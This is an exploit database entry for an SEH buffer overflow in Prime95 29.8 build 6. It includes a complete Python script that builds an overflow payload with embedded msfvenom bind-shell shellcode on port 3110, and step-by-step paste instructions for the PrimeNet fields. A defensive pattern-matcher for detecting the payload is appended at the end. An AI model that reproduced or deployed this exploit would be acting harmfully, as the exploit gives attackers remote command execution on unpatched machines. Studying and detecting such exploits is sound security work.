Vendor: Prime95
By: Achilles
CVSS: 7.5 HIGH
Buffer Overflow (SEH)
CWE: 119
Product Name: Prime95
Affected Version From: 29.8 build 6
Affected Version To: 29.8 build 6
Patch Exists: NO
Related CWE: Not provided
CPE: a:prime95:prime95:29.8:build:6
Metasploit:
Other Scripts:
Platforms Tested: Windows 7 x64
2019

Prime95 Version 29.8 build 6 – Buffer Overflow (SEH)

Prime95 version 29.8 build 6 is vulnerable to a structured exception handler (SEH) buffer overflow. A Python script generates a malicious file; its content is copied to the clipboard and pasted into specific fields of the Prime95.exe application, which overflows the buffer and lets an attacker execute arbitrary code and gain unauthorized access to the system. The result is a bind shell on port 3110, giving the attacker remote command execution. The vulnerability is present in the libhwloc-15.dll library. The exploit's shellcode was generated with msfvenom for the Windows platform and encoded to avoid characters that would cause issues (the bad characters \x00, \x0a and \x0d). The exploit has been tested on Windows 7 x64.

Mitigation:

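To mitigate this vulnerability, users should update to a patched version of Prime95 that addresses the buffer overflow issue; this entry lists no patch for 29.8 build 6 (Patch Exists: NO). Additionally, exercise caution when opening files from untrusted sources, and do not paste their content into the PrimeNet fields named in the steps below.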

Exploit-DB raw data:

# Exploit Title: Prime95 Version 29.8 build 6 - Buffer Overflow (SEH)
# Date: 2019-12-22
# Vendor Homepage: https://www.mersenne.org
# Software Link:   http://www.mersenne.org/ftp_root/gimps/p95v298b6.win32.zip
# Exploit Author: Achilles
# Tested Version: 29.8 build 6
# Tested on: Windows 7 x64

# 1.- Run python code:Prime95.py
# 2.- Open EVIL.txt and copy content to Clipboard
# 3.- Open Prime95.exe go to PrimeNet
# 4.- Paste the Content of EVIL.txt into the field "Optional User ID and Optional Computer Name"
# 5.- Click Connection Paste the Content of EVIL.txt into the field "Optional proxy Host"
# 6.- Press ok Twice and you will have a bind shell port 3110
# 7.- Greetings go:XiDreamzzXi,Metatron

#!/usr/bin/env python

import struct

buffer = "\x41" * 660
nseh = "\xeb\x06\x90\x90" #jmp short 6
seh  =  struct.pack('<L',0x6ee410b1) #libhwloc-15.dll
nops =  "\x90" * 20

#msfvenom -a x86 --platform windows -p windows/shell_bind_tcp LPORT=3110 -e x86/shikata_ga_nai -b "\x00\x0a\x0d" -i 1 -f python
#badchars "\x00\x0a\x0d"
shellcode = ("\xb8\xf4\xc0\x2a\xd0\xdb\xd8\xd9\x74\x24\xf4\x5a\x2b"
"\xc9\xb1\x53\x31\x42\x12\x83\xea\xfc\x03\xb6\xce\xc8"
"\x25\xca\x27\x8e\xc6\x32\xb8\xef\x4f\xd7\x89\x2f\x2b"
"\x9c\xba\x9f\x3f\xf0\x36\x6b\x6d\xe0\xcd\x19\xba\x07"
"\x65\x97\x9c\x26\x76\x84\xdd\x29\xf4\xd7\x31\x89\xc5"
"\x17\x44\xc8\x02\x45\xa5\x98\xdb\x01\x18\x0c\x6f\x5f"
"\xa1\xa7\x23\x71\xa1\x54\xf3\x70\x80\xcb\x8f\x2a\x02"
"\xea\x5c\x47\x0b\xf4\x81\x62\xc5\x8f\x72\x18\xd4\x59"
"\x4b\xe1\x7b\xa4\x63\x10\x85\xe1\x44\xcb\xf0\x1b\xb7"
"\x76\x03\xd8\xc5\xac\x86\xfa\x6e\x26\x30\x26\x8e\xeb"
"\xa7\xad\x9c\x40\xa3\xe9\x80\x57\x60\x82\xbd\xdc\x87"
"\x44\x34\xa6\xa3\x40\x1c\x7c\xcd\xd1\xf8\xd3\xf2\x01"
"\xa3\x8c\x56\x4a\x4e\xd8\xea\x11\x07\x2d\xc7\xa9\xd7"
"\x39\x50\xda\xe5\xe6\xca\x74\x46\x6e\xd5\x83\xa9\x45"
"\xa1\x1b\x54\x66\xd2\x32\x93\x32\x82\x2c\x32\x3b\x49"
"\xac\xbb\xee\xe4\xa4\x1a\x41\x1b\x49\xdc\x31\x9b\xe1"
"\xb5\x5b\x14\xde\xa6\x63\xfe\x77\x4e\x9e\x01\x7b\xa9"
"\x17\xe7\xe9\xa5\x71\xbf\x85\x07\xa6\x08\x32\x77\x8c"
"\x20\xd4\x30\xc6\xf7\xdb\xc0\xcc\x5f\x4b\x4b\x03\x64"
"\x6a\x4c\x0e\xcc\xfb\xdb\xc4\x9d\x4e\x7d\xd8\xb7\x38"
"\x1e\x4b\x5c\xb8\x69\x70\xcb\xef\x3e\x46\x02\x65\xd3"
"\xf1\xbc\x9b\x2e\x67\x86\x1f\xf5\x54\x09\x9e\x78\xe0"
"\x2d\xb0\x44\xe9\x69\xe4\x18\xbc\x27\x52\xdf\x16\x86"
"\x0c\x89\xc5\x40\xd8\x4c\x26\x53\x9e\x50\x63\x25\x7e"
"\xe0\xda\x70\x81\xcd\x8a\x74\xfa\x33\x2b\x7a\xd1\xf7"
"\x5b\x31\x7b\x51\xf4\x9c\xee\xe3\x99\x1e\xc5\x20\xa4"
"\x9c\xef\xd8\x53\xbc\x9a\xdd\x18\x7a\x77\xac\x31\xef"
"\x77\x03\x31\x3a")
payload = buffer + nseh + seh + nops + shellcode

try:
    f=open("Evil.txt","w")
    print "[+] Creating %s bytes evil payload.." %len(payload)
    f.write(payload)
    f.close()
    print "[+] File created!"
except:
    print "File cannot be created"
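
For detection, the following added example (Python 3, not part of the original advisory or the Exploit-DB script) flags files or captured field input shaped like the payload above: a long filler run, a short-jump nSEH, a handler address and a NOP sled. The function name, the length thresholds and the inert sample (0xCC bytes in place of shellcode) are assumptions constructed for illustration.

```python
import re
import struct

# Shape of the payload built by the script above: a run of one repeated filler
# byte, a 4-byte nSEH holding "jmp short" (EB xx) padded with two NOPs, a
# 4-byte little-endian handler address, then a NOP sled before the code.
# The minimum lengths (64 filler bytes, 8 NOPs) are assumed thresholds.
SEH_SHAPE = re.compile(
    rb"(?P<filler>(?P<fill>[\x20-\x7e])(?P=fill){63,})"  # >= 64 identical printable bytes
    rb"(?P<nseh>\xeb[\x01-\x7f]\x90\x90)"                # forward short jump + padding
    rb"(?P<handler>.{4})"                                # overwritten handler pointer
    rb"(?P<nops>\x90{8,})",                              # landing sled
    re.DOTALL,
)


def find_seh_overwrite(data: bytes) -> list:
    """Return one finding per region of `data` shaped like an SEH overwrite."""
    findings = []
    for m in SEH_SHAPE.finditer(data):
        findings.append({
            "offset": m.start(),
            "filler_len": len(m.group("filler")),
            "jump_distance": m.group("nseh")[1],
            "handler": struct.unpack("<L", m.group("handler"))[0],
            "nop_len": len(m.group("nops")),
            "trailing_len": len(data) - m.end(),
        })
    return findings


# Constructed sample: same layout and values as the page's script, with inert
# 0xCC bytes standing in for the shellcode.
SAMPLE = (b"\x41" * 660 + b"\xeb\x06\x90\x90" + struct.pack("<L", 0x6EE410B1)
          + b"\x90" * 20 + b"\xcc" * 32)
# Constructed benign input: a long but ordinary field value.
BENIGN = b"A" * 700 + b" workstation-01"

if __name__ == "__main__":
    for hit in find_seh_overwrite(SAMPLE):
        print("SEH-overwrite shape at offset %d: filler=%d handler=0x%08x nops=%d"
              % (hit["offset"], hit["filler_len"], hit["handler"], hit["nop_len"]))
    print("benign findings:", find_seh_overwrite(BENIGN))
```

Read candidate files in binary mode so the non-ASCII bytes reach the matcher unchanged.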